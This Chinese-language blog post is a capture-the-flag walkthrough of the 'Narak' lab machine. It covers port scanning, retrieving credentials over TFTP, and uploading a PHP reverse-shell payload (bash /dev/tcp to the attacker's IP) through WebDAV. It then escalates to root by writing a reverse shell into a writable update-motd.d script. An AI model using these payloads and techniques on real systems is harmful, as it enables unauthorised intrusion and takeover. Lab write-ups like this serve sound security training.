主机发现
sudo nmap -sT --min-rate 10000 -p- xx.xx.xx.xx -oA nmapscan/ports
sudo nmap -sT -sV -sC -O -p22,80 xx.xx.xx.xx -oA nmapscan/detail
sudo nmap -sU --top-ports 20 xx.xx.xx.xx -oA nmapscan/udp
发现了一个tftp,能够进行渗透
sudo nmap --script=vuln -p22,80 xx.xx.xx.xx -oA nmapscan/vuln
访问网页
是有关于一个宗教主题的
目录爆破
sudo gobuster -u http://xx..xx.xx/ -w xx
sudo dirb -u http://xx.xx.xx.xx
发现了一个webdav,对webdav的解释
并没有发现很多有意义的东西,深度爆破
sudo dirb -u http://xx.xx.xx.xx -X txt,php,zip,rar,sql -w xx
有个提示说narak的们在creds.txt中
通过tftp尝试下载creds.txt
tftp xx.xx.xx.xx
tftp>get creds.txt
成功下载
展开并进行base64解码
cat creds.txt | base64 -d
yamdoot:Swarg 获得凭据,使用凭据的是ssh和webdav这两个地方
一个是ssh
ssh登录
sudo ssh [email protected]
登陆失败
webdav登录
网页访问
xx.xx.xx.xx/webdav 弹出登录凭据
但是里面没有东西
所以切换通过命令行方式连接
davtest命令登录
davtest ip 凭据
davtest -url http://xx.xx.xx.xx/webdav -auth yamdoot:Swarg
查看有什么具有执行权限的后缀
发现php是具有执行权限的
也可以通过cadaver登录 kali默认用这个客户端登录
cadaver http://xx.xx.xx.xx/webdav
输入凭据
构造一个php的反弹shell
sudo vim shell.txt
<?php exec("bash -c 'bash -i >& /dev/tcp/kali's ip/1234 0>&1'");?>
通过cadaver将文件put进目标机中
网页访问并点击
kali端进行监听成功获取shell
权限查看
查找能够写入的文件
find / -writable -type f -not path "/proc/*" -not -path "/sys/*" 2> /dev/null
查看这个脚本的文件
发现是brainfuck的格式
保存这个语法并用命令解释得到一串字符
应该是一串密码
看看有什么用户进行拼接
cat /etc/passwd
有narak yamdoot inferno
通过inferno成功登录
查看inferno这个shell的权限
id uname -a whoami rsa_release -a ip a
家目录查看flag
发现这里有欢迎的信息,直接查看motd所在的文件夹查看是否有相应对应的sh脚本操作
在update-motd.d这个目录(motd全局性,脚本执行性)下的都是执行信息,00-header的是最优先执行的脚本,所以先查看00-header
发现是一个sh脚本,通过写入bash反弹shell
然后重新登录infernossh并进行kali监听成功拿下root权限的shell
标签:shell,motd,webdav,Narak,--,sudo,xx,tftp,txt From: https://www.cnblogs.com/lisenMiller/p/17379645.html